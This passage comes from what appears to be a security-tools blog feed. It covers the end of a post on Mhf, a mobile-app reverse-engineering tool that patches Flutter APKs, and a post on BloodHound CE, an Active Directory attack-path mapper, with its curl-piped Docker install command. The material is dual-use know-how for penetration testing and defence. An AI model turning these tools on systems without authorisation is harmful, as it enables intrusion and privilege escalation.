</td> </tr> <tr> <td align="center">Detect if JS files are encrypted</td> <td></td> <td align="right">β</td> <td align="right"></td> <td align="right">β</td> <td align="right"></td> <td align="right"></td> </tr> <tr> <td align="center">Detect if the resources are compressed.</td> <td></td> <td align="right">β</td> <td align="right">Hermesβ
</td> <td align="right">β</td> <td align="right">β</td> <td align="right">XALZβ
</td> </tr> <tr> <td align="center">Detect if the app is split</td> <td></td> <td align="right">β</td> <td align="right">β</td> <td align="right">β</td> <td align="right">β</td> <td align="right">β</td> </tr> </tbody></table> <p><code>What is patching apk:</code> This tool uses Reflutter, a framework that assists with <a href="https://www.kitploit.com/search/label/Reverse%20Engineering" target="_blank" title="reverse engineering">reverse engineering</a> of Flutter apps using a patched version of the Flutter library.</p> <p>More information: https://github.com/Impact-I/reFlutter </p><hr /> <p><code>Split APKs</code> is a technique used by Android to reduce the size of an application and allow users to download and use only the necessary parts of the application.</p> <p>Instead of downloading a complete application in a single APK file, Split APKs divide the application into several smaller APK files, each of which contains only a part of the application such as resources, code libraries, assets, and configuration files.</p> <pre><code>adb shell pm path com.package<br />package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/base.apk<br />package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.arm64_v8a.apk<br />package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.en.apk<br />package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.xxhdpi.apk<br /></code></pre> <p>For example, in Flutter if the application is a Split it's necessary patch split_config.arm64_v8a.apk, this file contains libflutter.so </p> <br /><span style="font-size: large;"><b>Credits</b></span><br /> <ul> <li>This tool use a secrets-patterns-db repositorty created by <a href="https://github.com/mazen160/secrets-patterns-db" rel="nofollow" target="_blank" title="mazen160">mazen160</a></li> <li>This tool use a regular expresion created by <a href="https://github.com/mazen160/https://github.com/GerbenJavado/LinkFinder/blob/master/linkfinder.py" rel="nofollow" target="_blank" title="Gerben_Javado">Gerben_Javado</a> for extract endpoints</li> <li>This tools use <a href="https://www.kitploit.com/search/label/reFlutter" target="_blank" title="reflutter">reflutter</a> for flutter actions </li> </ul> <br /><span style="font-size: large;"><b>Changelog</b></span><br /> <br /><b>0.5</b><br /> <ul> <li>Public release</li> <li>Bug fixes</li> </ul> <br /><b>0.4</b><br /> <ul> <li>Added plugins information in Cordova apps</li> <li>Added Xamarin actions</li> <li>Added NativeScript actions</li> <li>Bug fixes</li> </ul> <br /><b>0.3</b><br /> <ul> <li>Added NativeScript app detection</li> <li>Added signing option when the apk extracted of aab file is not signed</li> </ul> <br /><b>0.2</b><br /> <ul> <li>Fixed issues with commands on Linux.</li> </ul> <br /><b>0.1</b><br /> <ul> <li>Initial version release.</li> </ul> <br /><span style="font-size: large;"><b>License</b></span><br /> <ul> <li>This work is licensed under a Creative Commons Attribution 4.0 International License.</li> </ul> <br /><span style="font-size: large;"><b>Autors</b></span><br /> <p><a href="https://twitter.com/__stux" rel="nofollow" target="_blank" title="Cesar Calderon">Cesar Calderon</a> <a href="https://websec.mx/" rel="nofollow" target="_blank" title="Marco Almaguer">Marco Almaguer</a></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/stuxctf/mhf" rel="nofollow" target="_blank" title="Download Mhf">Download Mhf</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-77861886549037308932024-03-04T08:30:00.001-03:002024-03-04T08:30:00.134-03:00BloodHound - Six Degrees Of Domain Admin<p></p><p></p><p align="center"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjapo5OJmW2ZGdWH6Fut4H-kEifhE9oTnwxqfSjRz7zjVuMwhsOoOJtuqRNmn_cVxcziFJsoEiw8UbrJt-R1bNNx5-jEm4o1ztvvjF5PkfacD2uURmR-mf5o65gM0tkNdvi9aDO72eBJve4nuG-TDUeUWjXCLMC7VWMz8wQTUeUoW0pK3x3F_8YCPpfuzio"><img alt="" border="0" height="548" id="BLOGGER_PHOTO_ID_7338668270705967650" src="https://blogger.googleusercontent.com/img/a/AVvXsEjapo5OJmW2ZGdWH6Fut4H-kEifhE9oTnwxqfSjRz7zjVuMwhsOoOJtuqRNmn_cVxcziFJsoEiw8UbrJt-R1bNNx5-jEm4o1ztvvjF5PkfacD2uURmR-mf5o65gM0tkNdvi9aDO72eBJve4nuG-TDUeUWjXCLMC7VWMz8wQTUeUoW0pK3x3F_8YCPpfuzio=w640-h548" width="640" /></a></p><p align="center"><br /></p> <p>BloodHound is a monolithic web application composed of an embedded React frontend with <a href="https://www.sigmajs.org/" rel="nofollow" target="_blank" title="Sigma.js">Sigma.js</a> and a <a href="https://go.dev/" rel="nofollow" target="_blank" title="Go">Go</a> based REST API backend. It is deployed with a <a href="https://www.postgresql.org/" rel="nofollow" target="_blank" title="Postgresql">Postgresql</a> application database and a <a href="https://neo4j.com/" rel="nofollow" target="_blank" title="Neo4j">Neo4j</a> graph database, and is fed by the <a href="https://github.com/BloodHoundAD/SharpHound" rel="nofollow" target="_blank" title="SharpHound">SharpHound</a> and <a href="https://github.com/BloodHoundAD/AzureHound" rel="nofollow" target="_blank" title="AzureHound">AzureHound</a> data collectors.</p> <p>BloodHound uses <a href="https://www.kitploit.com/search/label/Graph%20Theory" target="_blank" title="graph theory">graph theory</a> to reveal the hidden and often unintended relationships within an <a href="https://www.kitploit.com/search/label/Active%20Directory" target="_blank" title="Active Directory">Active Directory</a> or Azure environment. Attackers can use <a href="https://www.kitploit.com/search/label/BloodHound" target="_blank" title="BloodHound">BloodHound</a> to easily identify highly complex attack paths that would otherwise be impossible to identify quickly. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory or Azure environment.</p> <p>BloodHound CE is created and maintained by the <a href="https://bloodhoundenterprise.io" rel="nofollow" target="_blank" title="BloodHound Enterprise Team">BloodHound Enterprise Team</a>. The original BloodHound was created by <a href="https://www.twitter.com/_wald0" rel="nofollow" target="_blank" title="@_wald0">@_wald0</a>, <a href="https://twitter.com/CptJesus" rel="nofollow" target="_blank" title="@CptJesus">@CptJesus</a>, and <a href="https://twitter.com/harmj0y" rel="nofollow" target="_blank" title="@harmj0y">@harmj0y</a>.</p> <span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Running BloodHound Community Edition</b></span><br /> <p>The easiest way to get up and running is to use our pre-configured Docker Compose setup. The following steps will get BloodHound CE up and running with the least amount of effort.</p> <ol> <li>Install Docker Compose and ensure Docker is running. This should be included with the <a href="https://www.docker.com/products/docker-desktop/" rel="nofollow" target="_blank" title="Docker Desktop">Docker Desktop</a> installation</li> <li>Run <code>curl -L https://ghst.ly/getbhce | docker compose -f - up</code></li> <li>Locate the randomly generated password in the terminal output of Docker Compose</li> <li>In a browser, navigate to <code>http://localhost:8080/ui/login</code>. Login with a username of <code>admin</code> and the randomly generated password from the logs</li> </ol> <p>NOTE: going forward, the default <code>docker-compose.yml</code> example binds only to localhost (127.0.0.1). If you want to access BloodHound outside of localhost, you'll need to follow the instructions in <a href="https://github.com/SpecterOps/examples/docker-compose/README.md" rel="nofollow" target="_blank" title="examples/docker-compose/README.md">examples/docker-compose/README.md</a> to configure the host binding for the container.</p> <br /><span style="font-size: large;"><b>Installation Error Handling</b></span><br /> <ul> <li>If you encounter a "failed to get console mode for stdin: The handle is invalid." ensure Docker Desktop (and associated Engine is running). Docker Desktop does not automatically register as a startup entry. </li> </ul> <p align="center"> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEixBUvpG_6szaiuByEzz3zh7iCMbX8LXKZYHn9tniatuu1NfiBQBZUQ_udqiY1ePjGCsvfGgO-5xx5Y7bP_WfoQhbNhT0IaDRIMZzXiMDYjg-OqXsPasZVUL1reVZ8lshcNjP51LIw6MkyodfjUp9f7wh0w1j7_8Wf2zI_rX4BnaFmYdfTZeo61Ly_Ql7VP"><img alt="" border="0" id="BLOGGER_PHOTO_ID_7338668301600612402" src="https://blogger.googleusercontent.com/img/a/AVvXsEixBUvpG_6szaiuByEzz3zh7iCMbX8LXKZYHn9tniatuu1NfiBQBZUQ_udqiY1ePjGCsvfGgO-5xx5Y7bP_WfoQhbNhT0IaDRIMZzXiMDYjg-OqXsPasZVUL1reVZ8lshcNjP51LIw6MkyodfjUp9f7wh0w1j7_8Wf2zI_rX4BnaFmYdfTZeo61Ly_Ql7VP=s320" /></a> </p> <ul> <li>If you encounter an "Error response from daemon: Ports are not available: exposing port TCP 127.0.0.1:7474 -> 0.0.0.0:0: listen tcp 127.0.0.1:7474: bind: Only one usage of each socket address (protocol/network address/port) is normally permitted." this is normally attributed to the "Neo4J Graph Database - neo4j" service already running on your local system. Please stop or delete the service to continue.</li> </ul> <pre><code># Verify if Docker Engine is Running<br />docker info<br /><br /># Attempt to stop Neo4j Service if running (on Windows)<br />Stop-Service "Neo4j" -ErrorAction SilentlyContinue<br /></code></pre> <ul> <li>A successful installation of BloodHound CE would look like the below:</li> </ul> <p>https://github.com/SpecterOps/BloodHound/assets/12970156/ea9dc042-1866-4ccb-9839-933140cc38b9</p> <br /><span style="font-size: large;"><b>Useful Links</b></span><br /> <ul> <li><a href="https://ghst.ly/BHSlack" rel="nofollow" target="_blank" title="BloodHound Slack">BloodHound Slack</a></li> <li><a href="https://github.com/SpecterOps/BloodHound/wiki" rel="nofollow" target="_blank" title="Wiki">Wiki</a></li> <li><a href="https://github.com/SpecterOps/CONTRIBUTORS.md" rel="nofollow" target="_blank" title="Contributors">Contributors</a></li> <li><a href="https://github.com/SpecterOps/examples/docker-compose/README.md" rel="nofollow" target="_blank" title="Docker Compose Example">Docker Compose Example</a></li> <li><a href="https://support.bloodhoundenterprise.io/" rel="nofollow" target="_blank" title="BloodHound Docs">BloodHound Docs</a></li> <li><a href="https://github.com/SpecterOps/BloodHound/wiki/Development" rel="nofollow" target="_blank" title="Developer Quick Start Guide">Developer Quick Start Guide</a></li> <li><a href="https://github.com/SpecterOps/BloodHound/wiki/Contributing" rel="nofollow" target="_blank" title="Contributing Guide">Contributing Guide</a></li> </ul> <br /><span style="font-size: large;"><b>Contact</b></span><br /> <p>Please check out the <a href="https://github.com/SpecterOps/BloodHound/wiki/Contact" rel="nofollow" target="_blank" title="Contact page">Contact page</a> in our wiki for details on how to reach out with questions and suggestions.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/SpecterOps/BloodHound" rel="nofollow" target="_blank" title="Download BloodHound">Download BloodHound</a></span></b></div>Unknownnoreply@blogger.com